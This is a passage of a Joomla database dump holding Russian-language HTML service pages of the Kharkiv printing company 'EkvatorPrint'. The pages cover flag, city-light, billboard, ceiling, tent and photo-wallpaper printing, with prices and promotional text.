#0000ff;\"><strong>Заказать печать:</strong></span></span></p>\r\n<p>Принимаем заказы по звонку или по e-mail.<br />Печать осуществляем в тот же день при заказе в первой половине дня.</p>\r\n<p> </p>\r\n<hr />\r\n<p> </p>\r\n<p style=\"text-align: justify;\"><strong><img src=\"images/stories/bawnja.jpg\" border=\"0\" style=\"float: left; margin: 10px; border: 1px solid grey;\" /></strong></p>\r\n<p style=\"text-align: justify;\"><strong>Печать фотообоев</strong> открывает массу возможностей, только подумайте: вы можете жить возле <strong>Эйфелевой башни</strong>, просыпаться и видеть яркое и радужное <strong>ромашковое поле</strong>, наслаждаться романтическим закатом и вспоминать тот самый волшебный отпуск…<br />Все-все, что пожелаете видеть в своем доме – все возможно!</p>\r\n<p style=\"text-align: justify;\"><strong>Печать фотообоев</strong> не знает ограничений, ни в просторах фантазии при выборе рисунка ни в  масштабах. Наше современное оборудование, выполняет цветную и яркую  широкоформатную печать любых размеров.</p>\r\n<p><img src=\"images/stories/romawki.jpg\" border=\"0\" width=\"300\" style=\"float: right; margin: 15px 10px; border: 1px solid grey;\" /></p>\r\n<p> </p>\r\n<p>Уверяем вас, печать  фотообоев – это возможность внести в вашдом некую изюминку, которая  будет, словно магнит, притягивать к себе взгляды, завораживать, дарить  тепло, уют и вовлекать в атмосферу выбранного рисунка.<br /><br />Современная  широкоформатная печать, позволяет изготавливать фотообои не только  ярких, насыщенных цветов, но и стойких. Фотообои будут радовать вас  своей красотой долгие годы.<br /><br /></p>\r\n<h4><strong>А теперь подробнее о там, как и на чем осуществляется печать фотообоев</strong></h4>\r\n<h4>Материал печати</h4>\r\n<p>Печать  фотообоев осуществляется на специальном материале, который предназначен  исключительно для фотообоев. <br /><br />Ширина  фотообоев составляет 1,3 м, поэтому их поклейка будет весьма удобной. А  поскольку материал устойчив к стиранию, то их долгий срок службы вам  гарантирован<br /><br /></p>\r\n<h4>Качество печати</h4>\r\n<p style=\"text-align: justify;\">С нашей  стороны, мы гарантируем, что наше оборудование выполнит печать  фотообоев с ярким, четким и контрастным изображением. Ну а вам остается  только предоставить нам фотографию будущих обоев высокого качества в  электронном виде.<br /> <br /></p>\r\n<h4>Где найти изображение для фотообоев?</h4>\r\n<p style=\"text-align: center;\"><img src=\"images/stories/zakat.jpg\" border=\"0\" height=\"200\" style=\"border: 1px solid grey; float: right; margin-left: 10px; margin-right: 10px;\" /></p>\r\n<p style=\"text-align: justify;\">Интернет  открывает перед нами массу возможностей, поэтому найти среди  многочисленных картинок интернет понравившееся вам изображение, не  проблема. Ассортимент картинок исчисляется миллионами.<br /><br />Наиболее качественные и профессиональные фотографии вы найдете на сайтах «фотобанка».<br /><br />Еще  один оригинальный вариант, заказать фотосессию и обработку фотографий у  фотографа. Так вы сможете заказать печать фотообоев с изображением  вашей дружной семьи, с сияющей улыбкой своего ребенка… Опять же, тут  тоже нет пределов для полета фантазии. <br /><br /></p>\r\n<h4>Печать фотообоев – только первый этап, а вот как их клеить?</h4>\r\n<p><img src=\"images/stories/kleit.jpg\" border=\"0\" style=\"float: left; margin-left: 5px; margin-right: 5px; border: 1px solid grey;\" /></p>\r\n<p> </p>\r\n<p>Поклейка  фотообоев производится клеем для тяжелых фотообоев стык в стык. Особой  подготовки для стен не требуется, основное условие, чтобы они были  ровными.<br /><br />Каждый имеющий опыт работы с обоями, без труда поклеит и фотообои. Ну а в ином случае, можно привлечь специалистов</p>\r\n<p> </p>\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n</tr>\r\n<tr style=\"background-color: #6699cc;\">\r\n<td style=\"height: 2px;\"></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"images/stories/kraski.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"50\" style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" />\"ЭкваторПринт\" также оказывает следующие услуги:<br /><br />-   <a href=\"index.php?option=com_content&amp;view=article&amp;id=6&amp;Itemid=7\" title=\"печать на холсте\">печать на   холсте</a> - дайте своему фото новую жизнь<br /> - <a href=\"index.php?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на виниле\">печать на виниле</a> - яркая и недорогая наружная реклама<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=9&amp;Itemid=10\" title=\"печать на сетке баннерной\">печать   на сетке баннерной</a> - реклама на транспорте объедет весь город<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\" title=\"изготовление наружной   рекламы\">изготовление наружной рекламы</a> - все форматы и высокое качество<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=10&amp;Itemid=11\" title=\"печать   больших фотографий\">печать больших фотографий </a>- лучшему фото - достойный формат<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=13&amp;Itemid=14\" title=\"печать на фотообоях\">печать на фотообоях</a> - неповторимый стиль вашего дома<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=14&amp;Itemid=15\">печать флагов</a> - престижная реклама фирмы<br />- <a href=\"index.php?option=com_content&amp;view=article&amp;id=15&amp;Itemid=16\" title=\"широкоформатная печать ситилайтов\">печать ситилайтов</a>, наружная реклама на уровне глаз человека<br /></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2011-04-21 16:23:06',62,'','2015-11-03 07:57:07',62,0,'0000-00-00 00:00:00','2011-04-21 16:23:06','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',57,0,15,'','',0,20263,'robots=\nauthor='),(14,'Печать флагов','2011-04-26-17-31-04','','<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\">\r\n<h1 style=\"text-align: center;\">Печать флагов</h1>\r\n<p style=\"text-align: left;\">Полиграфия Экваторпринт осуществляет печать <strong>в Харькове</strong>. <br />Доставка осуществляется <strong>во все города Украины</strong> в сроки <strong>1-3 дня.</strong></p>\r\n<p style=\"text-align: left;\"><span style=\"color: #0000ff;\"><span style=\"font-size: medium;\"><strong>Цена печати:</strong></span></span></p>\r\n<table style=\"width: 695px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<colgroup><col width=\"309\"></col> <col width=\"171\"></col> <col width=\"87\"></col> <col span=\"2\" width=\"64\"></col> </colgroup> \r\n<tbody>\r\n<tr style=\"text-align: center; background-color: #172983; height: 40px;\">\r\n<td rowspan=\"2\" width=\"309\" height=\"60\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Материал</strong></span></span></td>\r\n<td rowspan=\"2\" width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Ширина рулона</strong></span></span></td>\r\n<td rowspan=\"2\" width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Плотность(г/м2)</strong></span></span></td>\r\n<td colspan=\"2\" width=\"128\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Стоимость(грн./м2)</strong></span></span></td>\r\n</tr>\r\n<tr style=\"background-color: #172983; height: 20px; text-align: center;\">\r\n<td width=\"64\" height=\"20\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>до 10м?</strong></span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>от   10</strong></span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"40\">\r\n<td style=\"text-align: left;\" width=\"309\" height=\"40\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">Ткань флажная</span></span></span></td>\r\n<td width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">1.52</span></span></span></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">120</span></span></span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\">152</span></td>\r\n<td width=\"64\"><span style=\"font-size: small;\">137</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\"><span style=\"font-size: small;\"><strong>Наиболее популярные размеры флагов:</strong><br /> 200х146см - <strong>447грн.</strong><br /> 146х100см - <strong>223грн.</strong><br /> 146х50см   - <strong>110грн. </strong><br /> 100х100см - <strong>194грн.</strong><br /> 100х50см   - <strong>98грн.</strong></span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\"><strong>Заказать печать:</strong></span></span></p>\r\n<p style=\"text-align: left;\">Принимаем заказы по звонку или по e-mail.</p>\r\n<p> </p>\r\n<hr />\r\n<p> </p>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/flag-1.jpg\" border=\"0\" style=\"float: left; margin: 10px; border: 1px solid grey;\" />У вас успешная компания? Вы фанат футбольного клуба? Или, может быть, вы решили удивить всех своим флагом – символом вашей фамилии (семьи)?</p>\r\n<p style=\"text-align: justify;\">В таком случае вам просто необходимо заказать печать флагов.</p>\r\n<p style=\"text-align: justify;\"><strong>Широкоформатная печать</strong> <strong>флагов</strong> вашей компании повысит и укрепит статус фирмы. Ведь флаг, развивающийся при входе в офис, поможет сделать ваш бренд узнаваемым, придаст солидность фирме и привлечет внимание клиентов.</p>\r\n<h4 style=\"text-align: justify;\">Нужно уметь выбрать флаг.</h4>\r\n<p style=\"text-align: justify;\">Но, печать флагов – дело непростое. Чтобы флаг красиво развевался на ветру, чтобы он быстро высыхал после дождя или снега и не был очень тяжелым в мокром состоянии, печать флагов должна выполняться на легкой, и в то же время прочной, ткани.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/flag-2.jpg\" border=\"0\" width=\"250\" height=\"184\" style=\"margin: 5px 10px; border: 1px solid grey; float: right;\" /></p>\r\n<p style=\"text-align: justify;\">Этим условиям соответствует <strong>широкоформатная печать на полиэстеровой ткани</strong>. Флаги, выполненные в такой технике будут шикарно выглядеть в любых погодных условиях. Даже маленький ветерок заставит такой стяг развеваться.</p>\r\n<p style=\"text-align: justify;\">Широкоформатная печать флагов осуществляется на полиэстровой ткани плотностью <strong>125г/м2.</strong></p>\r\n<p style=\"text-align: justify;\">Для эксплуатации в неблагоприятных условиях подходит более плотный материал. Осадки, повышенная влажность, морской воздух и соленые брызги не страшны флагу, если для его изготовления использовалась <strong>широкоформатная печать</strong> на полиэстровой ткани повышенной плотности.</p>\r\n<p style=\"text-align: justify;\">Напоминающий своей структурой шерстяную ткань, такой флаг будет украшать мачту или здание достаточно долго. Для использования в менее экстремальных условиях, подойдет широкоформатная печать флагов на полиэстровой ткани с меньшей плотностью.</p>\r\n<h4 style=\"text-align: justify;\">Ну и «мастерица», эта широкоформатная печать.</h4>\r\n<p style=\"text-align: justify;\"><a href=\"/\" title=\"широкоформатная печать в Харькове\"><strong>Широкоформатная печать</strong></a>, благодаря современным технологиям, позволяет создавать <strong>флаги</strong> различных размеров с изображением любой сложности достаточно быстро.</p>\r\n<p style=\"text-align: justify;\">Особенно актуально использование широкоформатной печати, когда необходима печать на полиэстровой ткани замысловатых узоров. Печать флагов – всего один пример, когда широкоформатная печать просто незаменима.</p>\r\n<p style=\"text-align: justify;\">Для вас, наша фирма \"ЭкваторПринт\" города Харьков изготовит как небольшие <strong>офисные корпоративные флажки</strong>, так и величественные <strong>флаги для улиц</strong>. Печать флагов на полиэстеровой ткани подарит вам легкий, и в то же время прочный символ вашей компании, флаг города Харьков, государства или футбольного клуба.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><a href=\"administrator/index.php?option=com_content&amp;sectionid=0&amp;task=edit&amp;cid[]=14\">Сохранить</a></p>','',1,0,0,0,'2011-04-26 17:26:23',62,'','2015-11-03 07:57:44',62,0,'0000-00-00 00:00:00','2011-04-26 17:26:23','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',42,0,14,'','Широкоформатная печать флагов в Харькове на полиэстеровой ткани. Доставка по всей Украине',0,16700,'robots=\nauthor='),(15,'Печать сити-лайтов','2011-06-06-17-35-17','','<h1 style=\"text-align: center;\">Печать ситилайтов</h1>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p>Полиграфия Экваторпринт осуществляет печать <strong>в Харькове</strong>. <br />Доставка осуществляется <strong>во все города Украины</strong> в сроки <strong>1-3 дня.</strong></p>\r\n<p><span style=\"color: #0000ff;\"><span style=\"font-size: medium;\"><strong>Цена печати:</strong></span></span></p>\r\n<table style=\"width: 695px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<colgroup><col width=\"309\"></col> <col width=\"171\"></col> <col width=\"87\"></col> <col width=\"64\"></col> </colgroup> \r\n<tbody>\r\n<tr style=\"text-align: center; background-color: #172983; height: 40px;\">\r\n<td width=\"309\" height=\"60\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Материал</strong></span></span></td>\r\n<td width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Ширина рулона</strong></span></span></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Плотность(г/м2)</strong></span></span></td>\r\n<td width=\"128\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Стоимость(грн./шт)</strong></span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"40\">\r\n<td style=\"text-align: left;\" width=\"309\" height=\"40\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">Постер сити-лайт (1.2х1.8)на бумаге \"Бэклит\" (за шт.)</span></span></span></td>\r\n<td width=\"171\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">1.25</span></span></span></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\"><span style=\"color: #333333;\">150</span></span></span></span></td>\r\n<td width=\"128\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">109</span></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\"><strong>Заказать печать:</strong></span></span></p>\r\n<p>Принимаем заказы по звонку или по e-mail.<br />Печать осуществляем в тот же день при заказе в первой половине дня.</p>\r\n<p> </p>\r\n<hr />\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p style=\"text-align: justify;\"><strong><img src=\"images/stories/sitilajt-big.jpg\" border=\"0\" width=\"250\" style=\"float: left; margin-left: 5px; margin-right: 5px; border: 1px solid grey;\" />Сити-лайт</strong> — рекламная современная конструкция чуть выше роста человека, информационная рекламная составляющая размещается на уровне взгляда человека, что способствует более качественному контакту  с потребителем.</p>\r\n<p style=\"text-align: justify;\"><strong>Преимущества наружной рекламы на сити-лайтах:</strong></p>\r\n<ol style=\"text-align: justify;\">\r\n<p>- Хорошее месторасположение сити лайтов —вдоль тротуаров и больших потоков атомобилей</p>\r\n<p>- Круглосуточная реклама, что обеспечивается внутренней подсветкой в ночное время<br /><br />- Печать сити лайтов осуществляется на материале не большого формата, что позволяет экономить на печати, сравнительно с другими масштабами широкоформатной печати наружной рекламы</p>\r\n<p>- Качественный контакт рекламы сити лайта с потенциальным потребителем, можно подойти поближе и ознакомится с информацией более подробно</p>\r\n<p>- Размещая сити лайты несколько раз по пути потока людей, и повторяя свою рекламу, имидж и образ вашей компании будет более узнаваем.</p>\r\n<p><br /> <strong>Печать сити лайтов в «ЭкваторПринт» гарантирует вам стойкую ярко красочную рекламу!<br /></strong></p>\r\n</ol></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p><img src=\"images/stories/s-1.jpg\" border=\"0\" width=\"250\" height=\"280\" /></p>\r\n</td>\r\n<td></td>\r\n<td>\r\n<p><img src=\"images/stories/s-2.jpg\" border=\"0\" width=\"250\" height=\"280\" /></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p><img src=\"images/stories/s-3.jpg\" border=\"0\" width=\"250\" height=\"280\" /></p>\r\n</td>\r\n<td></td>\r\n<td>\r\n<p><img src=\"images/stories/s-4.jpg\" border=\"0\" width=\"250\" height=\"280\" /></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2011-06-06 17:32:13',62,'','2015-11-03 07:57:35',62,0,'0000-00-00 00:00:00','2011-06-06 17:32:13','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',31,0,13,'печать ситилайтов, печать сити лайтов, печать Харьков, печать сити лайтов Харкьов','Широкоформатная печать ситилайтов в Харькове. Доставка по всей Украине',0,5609,'robots=\nauthor='),(16,'Печать на потолках','2011-06-20-05-46-01','','<h1 style=\"text-align: center;\">Печать на натяжных потолках</h1>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p><img src=\"images/stories/p-4.jpg\" border=\"0\" width=\"250\" height=\"125\" style=\"float: left; margin-left: 10px; margin-right: 10px; border: 1px solid grey;\" /></p>\r\n<p style=\"text-align: justify;\">Натяжные потолки с нанесенными на их поверхность рисунком, называют <strong>художественными натяжными потолками</strong>.<br /><br />Наиболее часто на потолки наносят изображение неба и облаков.<br /><br />Широкоформатная печать на натяжных потолках осуществляется методом сольвентной и ультрафиолетовой печати.</p>\r\n<p style=\"text-align: justify;\"><strong>Натяжные художественные потолки широко распространены в оформлении интерьера и обладают целым рядом преимуществ:</strong><br /><br />- такие потолки быстро устанавливаются, тем самым трудовые затраты сведены к минимуму<br />-  устанавливая натяжные потолки, вы заoищаете свой дом от возможного протека воды сверху<br />- такие потолки пожаробезопасны<br />- художественные потолки обладают изысканными эстетическими свойствами<br />- нет ограничений в широкоформатной печати на потолках – мы реализуем любую вашу идею.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p><img src=\"images/stories/p-1.jpg\" border=\"0\" width=\"250\" height=\"150\" style=\"float: left; border: 1px solid grey;\" /></p>\r\n</td>\r\n<td>\r\n<p><img src=\"images/stories/p-2.jpg\" border=\"0\" width=\"250\" height=\"150\" style=\"float: left; margin-left: 2px; border: 1px solid grey;\" /></p>\r\n<br /></td>\r\n<td>\r\n<p><img src=\"images/stories/p-3.jpg\" border=\"0\" width=\"250\" height=\"150\" style=\"float: left; margin-left: 2px; border: 1px solid grey;\" /></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p><br /><strong>«ЭкваторПринт»</strong> осуществляет широкоформатную печать сольвентными чернилами на натяжных  потолках из виниловой пленки шириной до 3,2м разных фактур: глянец, мат,  сатин… <br /><br />Широкоформатная печать на натяжных потолках позволяет  воплотить в реальность практически любые дизайнерские решения и может  стать полезным инструментом в оформлении клубов, ресторанов, офисов и  магазинов.<br /><br />Применение широкоформатной печати на натяжных потолках  в сочетании с печатью на холсте, ткани и фотообоях позволит Вам  добиться уникальности и неповторимости Вашего интерьера.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2011-06-20 05:31:20',62,'','2014-09-22 12:18:23',62,62,'2014-11-04 14:03:27','2011-06-20 05:31:20','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',27,0,12,'Печать на потолках, печать на потолках харьков','Широкоформатная печать на натяжных потолках в Харькове. Доступная цена, свежие фото. Доставка по всей Украине',0,6590,'robots=\nauthor='),(17,'Печать на тенте','2011-06-20-06-02-25','','<h3 style=\"text-align: center;\">Печать на тенте</h3>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p><img src=\"images/stories/tent-big.jpg\" border=\"0\" width=\"250\" height=\"125\" style=\"float: left; margin-left: 10px; margin-right: 10px; border: 1px solid grey;\" /></p>\r\n<p style=\"text-align: justify;\"><strong>Осуществляем печать на материале заказчика!</strong></p>\r\n<p style=\"text-align: justify;\"><strong>Брезент</strong> - это тканый материал плотного плетения, обладающий специальными индивидуальными характеристиками. Наиболее часто используемыми материалами для изготовления брезента являются лен, хлопок либо их смесь. Это дает брезенту основное преимущество перед синтетическими материалами, которые не могут полностью заменить его. <br /><br />Помимо широкоформатной печати на баннере, широкоформатная печать на тенте является отличным способом, брендирования транспорта и торговых точек, может применяться при изготовлении фирменных  шатров и палаток.<br /> <br />Печать больших форматов сделает Вашу рекламу яркой и привлекательной.<br /><br /><strong>«ЭкваторПринт»</strong> осуществляет широкоформатную печать на тенте и брезенте с ПВХ покрытием. Мы гарантируем высокое качество печати и оперативность. <br /><br />Применение чернил на основе жесткого сольвента позволят сделать напечатанное изображение <strong>устойчивым к различным погодным воздействиям и ультрафиолетовым лучам, предохранят его от выгорания</strong>.</p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: medium;\">Креативная реклама при помощи печати на тенте:<br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: medium;\"><img src=\"images/stories/kreativnaja-reklama/avto/pechat-na-tente.jpg\" border=\"0\" alt=\"печать на тенте\" title=\"широкоформатная печать на тенте\" width=\"600\" height=\"418\" /><br /></span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2011-06-20 05:58:04',62,'','2012-07-27 07:27:14',62,62,'2014-11-04 14:03:19','2011-06-20 05:58:04','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',6,0,11,'широкоформатная печать, широкоформатная печать харьков','Печать на тенте широкоформатная в Харькове.',0,9485,'robots=\nauthor='),(18,'Печать билбордов','2012-01-11-12-11-54','','<h1 style=\"text-align: center;\">Печать бигбордов (билбордов)</h1>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p>Полиграфия Экваторпринт осуществляет печать <strong>в Харькове</strong>. <br />Доставка осуществляется <strong>во все города Украины</strong> в сроки <strong>1-3 дня.</strong></p>\r\n<p><span style=\"color: #0000ff;\"><span style=\"font-size: medium;\"><strong>Цена печати:</strong></span></span></p>\r\n<table style=\"width: 695px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<colgroup><col width=\"309\"></col> <col width=\"171\"></col> <col width=\"87\"></col> </colgroup> \r\n<tbody>\r\n<tr style=\"text-align: center; background-color: #172983; height: 40px;\">\r\n<td width=\"480\" height=\"40\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Материал</strong></span></span></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Плотность(г/м2)</strong></span></span></td>\r\n<td width=\"128\"><span style=\"font-size: small;\"><span style=\"color: #ffec00;\"><strong>Стоимость(грн./шт)</strong></span></span></td>\r\n</tr>\r\n<tr style=\"text-align: center;\" height=\"40\">\r\n<td style=\"text-align: left;\" width=\"309\" height=\"40\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">Постер (билборд) 3x6 на бумаге блюбэк (за шт.)</span></span></span></td>\r\n<td width=\"87\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">115</span></span></span></td>\r\n<td width=\"128\"><span style=\"font-size: small;\"><span style=\"color: #003300;\"><span style=\"color: #333333;\">443</span></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\"><strong>Заказать печать билборда:</strong></span></span></p>\r\n<p>Принимаем заказы по звонку или по e-mail.<br />Печать осуществляем в тот же день при заказе в первой половине дня.</p>\r\n<p> </p>\r\n<hr />\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p><img src=\"images/stories/pechat-bilbordov.jpg\" border=\"0\" alt=\"печать билбордов (бигбордов)\" title=\"печать билбордов \" width=\"300\" style=\"float: left; margin: 10px 5px; border: 0pt none;\" />Без сомнений, с билбордами знакомы практически все. На сегодняшний день,  <span style=\"font-size: small;\">билборд — один из самых востребованных видов наружной рекламы</span>.</p>\r\n<p> </p>\r\n<p style=\"text-align: center;\"><a href=\"print-billboards\" title=\"заказть печать билборда\"><span style=\"font-size: medium;\"><span style=\"color: #0000ff;\">Заказать печать билборда</span></span></a></p>\r\n<p><span style=\"font-size: small;\"><br />Печать бигбордов займет <strong>от 1 до 3 дней</strong>, в зависимости от тиража.<br />Небольшие заказы мы выполняем <strong>в течении дня</strong>.</span></p>\r\n<p><span style=\"font-size: small;\"><strong>Цена печати</strong> и качество материала указаны на странице <a href=\"index.php?option=com_content&amp;view=article&amp;id=2&amp;Itemid=3\" title=\"цена печати бигборда\">Прайс лист</a> (строка №9)</span></p>\r\n<p> </p>\r\n<p>В  переводе с английского <strong>\"big board\" (бигборд)</strong> — это большая доска,  представляющая собой одно- или двусторонний носитель рекламы.<br /><br />Поскольку  увидеть рекламные плакаты можно на всех популярных магистралях, то  <strong>печать билбордов</strong> очень востребована. Безусловно, такая реклама позволяет  проводить рекламные компании, рассчитанные как на долгий, так и на  короткий срок.<br /><br />Если печать билбордов заказана для долгосрочной  рекламы, то в качестве основы используют баннерную ткань, для  короткосрочных рекламных кампаний подойдет <strong><span style=\"font-size: small;\">бумага Blue Back Side</span></strong> или <a href=\"?option=com_content&amp;view=article&amp;id=7&amp;Itemid=8\" title=\"печать на самоклеющейся пленке\"><strong><span style=\"font-size: small;\"> самоклеящаяся плёнка</span></strong></a>.<br /><br />Как правило, <strong>печать бигбордов</strong> предполагает стандартный размер рекламного плаката, имеющего стороны  равные <span style=\"font-size: small;\">3 и 6 м</span>. Такой внушительный размер привлекает внимание. А  возможность расширить пространство путем выступления частей изображения  за стандартные границы дает дизайнерам неограниченные возможности для  воплощения оригинальных решений.<br /><br />Стоит отметить удобную  планировку большей части городов. Прямые улицы с отменной видимостью  повышают эффективность уличной рекламы, а значит, печать бигбордов  сохранит свою популярность.</p>\r\n<p><span style=\"font-size: large;\">Креативная реклама с помощью билбордов:</span></p>\r\n<p>Реклама молочного коктеля - \"теперь в три раза гуще\":<br /><img src=\"images/stories/kreativnaja-reklama/pechat-bigbordov-koktel.jpg\" border=\"0\" width=\"295\" height=\"341\" /></p>\r\n<p>Реклама на бигборде со слоганом: Натуральные цвета краски Berger:<br /><img src=\"images/stories/kreativnaja-reklama/bilbord/pechat-bigbordov-kraska.jpg\" border=\"0\" alt=\"печать бигбордов\" width=\"600\" height=\"441\" /></p>\r\n<p>Реклама шоколадного батончика \"теперь охлажденный\":<br /><img src=\"images/stories/kreativnaja-reklama/bilbord/pechat-bigbordov-mars.jpg\" border=\"0\" alt=\"печать бигбордов\" title=\"печать бигбордов Харьков\" width=\"600\" height=\"260\" style=\"border: 0pt none;\" /></p>\r\n<p>Призыв компании к размещению рекламы. <br />Надпись на бигборде: Чем скорее вы разместите здесь вашу рекламу - тем лучше.<br /><img src=\"images/stories/kreativnaja-reklama/bilbord/pechat-bigbordov-reklama.jpg\" border=\"0\" alt=\"печать билбордов\" width=\"600\" style=\"border: 0pt none;\" /></p>\r\n<p>Социальная реклама - \"Используйте электроэнергию с умом\":<img src=\"images/stories/kreativnaja-reklama/bilbord/pechat-bigbordov-electricit.jpg\" border=\"0\" alt=\"печать билбордов (бигбордов)\" width=\"600\" height=\"385\" style=\"border: 0pt none;\" /></p>\r\n<h4><br /><br /><img src=\"images/stories/kraski.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"50\" style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" />Печать билбордов отличается своими достоинствами:</h4>\r\n<strong>1. <span style=\"font-size: small;\"><span style=\"color: #0000ff;\">Увеличение количества</span> потенциальных клиентов.</span></strong><br />Находясь  в зоне внимания большого числа людей, бигборды вызывают интерес, что  расширяет круг клиентов. Поэтому печать бигбордов обеспечивает немалую  часть будущих покупателей.<br /><br /><strong>2. <span style=\"font-size: small;\"><span style=\"color: #0000ff;\">Привлечение внимания</span> прохожих, пассажиров и водителей</span></strong>.<br />Печать билбордов пользуется спросом, поскольку они 